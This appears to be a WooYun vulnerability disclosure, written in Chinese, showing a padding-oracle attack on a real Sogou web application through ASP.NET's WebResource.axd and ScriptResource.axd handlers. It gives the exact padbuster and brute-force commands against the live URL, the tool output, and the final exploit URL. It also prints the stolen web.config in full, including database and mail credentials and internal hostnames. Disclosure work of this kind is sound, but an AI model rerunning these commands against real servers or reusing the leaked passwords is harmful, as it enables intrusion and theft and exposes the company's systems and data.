WooYun.org

一切罪恶的根源在从页面中的这个链接开始：
http://mt.sogou.com/WebResource.axd?d=1450089073
该漏洞出现很久了利用脚本已公开，安装好perl环境，读取web.config执行：
perl padbuster.pl http://mt.sogou.com/WebResource.axd?d=9MBwmxN6TLKjC8S3CdFGyw2 9MBwmxN6TLKjC8S3CdFGyw2 16 -encoding 3 -plaintext "|||~/web.config"
几分钟后返回如下信息，输入2进行选择
INFO: The original request returned the following
[+] Status: 500
[+] Location: N/A
[+] Content Length: 4733
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 404 2093 N/A
2 ** 255 500 4733 N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (124/256) [Byte 16]
[+] Success: (59/256) [Byte 15]
[+] Success: (7/256) [Byte 14]
[+] Success: (26/256) [Byte 13]
[+] Success: (242/256) [Byte 12]
[+] Success: (176/256) [Byte 11]
[+] Success: (181/256) [Byte 10]
[+] Success: (145/256) [Byte 9]
[+] Success: (204/256) [Byte 8]
[+] Success: (93/256) [Byte 7]
[+] Success: (32/256) [Byte 6]
[+] Success: (1/256) [Byte 5]
[+] Success: (88/256) [Byte 4]
[+] Success: (229/256) [Byte 3]
[+] Success: (169/256) [Byte 2]
[+] Success: (79/256) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): dd2469dbdc9ccc5f492f39658493a084
[+] Intermediate Bytes (HEX): a15815a5f3eba93d674c560be2fac785
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: 3SRp29yczF9JLzllhJOghAAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------
到这里，就拿到了web.config的URL的加密地址。
下面就该上Webconfig Bruter.pl继续填充并获取完整的访问地址了。
perl Webconfig Bruter.pl http://mt.sogou.com/ScriptResource.axd 3SRp29yczF9JLzllhJOghAAAAAAAAAAAAAAAAAAAAAA1 16
等了半个多小时终于有了结果，返回了web.config的内部信息：
<?xml version="1.0" encoding="UTF-8"?>
<!--
有关如何配置 ASP.NET 应用程序的详细信息，请访问
http://go.microsoft.com/fwlink/?LinkId=169433
-->
<configuration>
<appSettings>
<!-- 内网线上环境配置 -->
<!--<add key="UserPermitQueryUrl" value="http://venus.sogou-inc.com" />
<add key="mysqlConnectionString" value="server=database.desktopqa.com;user id=venus_all; password=vnfjru@Venus_2013; database=cloud;
pooling=false;charset=utf8;Allow Zero Datetime=True" />
<add key="fileServerString" value="http://f.venus.sogou-inc.com" />
<add key="redisConnectionString" value="master.redis.desktopqa.com:6379" />
<add key="loginString" value="http://m.venus.sogou-inc.com/public/sso/#/?type=p3p*returnUrl=" />
<add key="logoutString" value="http://m.venus.sogou-inc.com/public/sso/#/?action=logout*type=p3p*returnUrl=" />
<add key="host" value="http://m.venus.sogou-inc.com" />
<add key="max" value="100" />-->
<!-- 内网测试环境配置 -->
<!--<add key="UserPermitQueryUrl" value="http://10.134.64.222:3000"/>-->
<!--<add key="UserPermitQueryUrl" value="http://pre.effevo.com"/>
<add key="mysqlConnectionString" value="server= test.mysql.desktopqa.com;user id=venus_all; password=vnfjru@Venus_2013; database=cloud;
pooling=false;charset=utf8;Allow Zero Datetime=True"/>
<add key="fileServerString" value="http://f.venus.sogou-inc.com"/>
<add key="redisConnectionString" value="test.redis.desktopqa.com:6379"/>
<add key="loginString" value="http://pre.effevo.com/public/sso/#/?type=jsonp*returnUrl=" />
<add key="logoutString" value="http://pre.effevo.com/public/sso/#/?action=logout*type=jsonp*returnUrl=" />
<add key="host" value="http://doc.desktopqa.com"/>
<add key="max" value="10000"/>-->
<!-- 外网线上环境配置 -->
<add key="UserPermitQueryUrl" value="http://anonymous.effevo.com"/>
<add key="mysqlConnectionString" value="server=master.mysql.desktopqa.com;user id=venus_all; password=vnfjru@Venus_2013; database=cloud_public;
pooling=false;charset=utf8;Allow Zero Datetime=True"/>
<add key="fileServerString" value="http://file.mt.sogou.com"/>
<add key="redisConnectionString" value="master.redis.effevo.com:6379"/>
<add key="loginString" value="http://mt.sogou.com/public/sso/#/?type=p3p*returnUrl="/>
<add key="logoutString" value="http://mt.sogou.com/public/sso/#/?action=logout*type=p3p*returnUrl="/>
<add key="host" value="http://mt.sogou.com"/>
<add key="max" value="100"/>
<!--调试跨域登录使用-->
<!--<add key="loginString" value="http://mt.sogou.com/public/sso/#/?type=jsonp*returnUrl="/>-->
<!--非匿名邮件服务器用户名密码-->
<add key="AuthenticationMailUsername" value="[email protected]" />
<add key="AuthenticationMailPassword" value="vns-2014" />
</appSettings>
<connectionStrings>
<add name="ApplicationServices" connectionString="data source=.\SQLEXPRESS;Integrated Security=SSPI;AttachDBFilename=|DataDirectory|\aspnetdb.mdf;User
Instance=true" providerName="System.Data.SqlClient" />
</connectionStrings>
<system.web>
<compilation debug="false" targetFramework="4.0" />
<httpRuntime maxRequestLength="2100000000" maxQueryStringLength="10240" executionTimeout="3600" />
<authentication mode="Forms">
<forms name=".ASPXAUTH" protection="All" timeout="60" />
</authentication>
<membership>
<providers>
<clear />
<add name="AspNetSqlMembershipProvider" type="System.Web.Security.SqlMembershipProvider" connectionStringName="ApplicationServices"
enablePasswordRetrieval="false" enablePasswordReset="true" requiresQuestionAndAnswer="false" requiresUniqueEmail="false" maxInvalidPasswordAttempts="5"
minRequiredPasswordLength="6" minRequiredNonalphanumericCharacters="0" passwordAttemptWindow="10" applicationName="/" />
</providers>
</membership>
<profile>
<providers>
<clear />
<add name="AspNetSqlProfileProvider" type="System.Web.Profile.SqlProfileProvider" connectionStringName="ApplicationServices"
applicationName="/" />
</providers>
</profile>
<roleManager enabled="false">
<providers>
<clear />
<add name="AspNetSqlRoleProvider" type="System.Web.Security.SqlRoleProvider" connectionStringName="ApplicationServices"
applicationName="/" />
<add name="AspNetWindowsTokenRoleProvider" type="System.Web.Security.WindowsTokenRoleProvider" applicationName="/" />
</providers>
</roleManager>
<httpModules>
<!--<add name="PreCheck" type="PreCheckModule" />-->
</httpModules>
</system.web>
<system.webServer>
<modules runAllManagedModulesForAllRequests="true" />
<security>
<requestFiltering>
<requestLimits maxAllowedContentLength="2147483647"></requestLimits>
</requestFiltering>
</security>
<staticContent>
<remove fileExtension=".woff" />
<mimeMap fileExtension=".woff" mimeType="application/font-woff" />
</staticContent>
<defaultDocument enabled="true">
<files>
<clear />
<add value="Default.html" />
<add value="Default.aspx" />
</files>
</defaultDocument>
<httpErrors errorMode="Custom">
<remove statusCode="404" subStatusCode="-1" />
<error statusCode="404" prefixLanguageFilePath="" path="/Pages/404.html" responseMode="ExecuteURL" />
</httpErrors>
</system.webServer>
<system.web>
<customErrors mode="Off" />
</system.web>
<location path="Pages/index.html">
<system.webServer>
<staticContent>
<clientCache cacheControlMode="DisableCache" />
</staticContent>
</system.webServer>
</location>
<location path="Default.html">
<system.webServer>
<staticContent>
<clientCache cacheControlMode="DisableCache" />
</staticContent>
</system.webServer>
</location>
</configuration>
Total Requests:31144
Resulting Exploit Block:eFbahIR-kVx2i1D4Yym7A90kadvcnMxfSS85ZYSToIQAAAAAAAAAAAAAAAAAAAAA0
页面访问的话，根据结尾的加密字符串构造url：
http://mt.sogou.com/ScriptResource.axd?d=eFbahIR-kVx2i1D4Yym7A90kadvcnMxfSS85ZYSToIQAAAAAAAAAAAAAAAAAAAAA0
配置文件中数据库密码信息泄露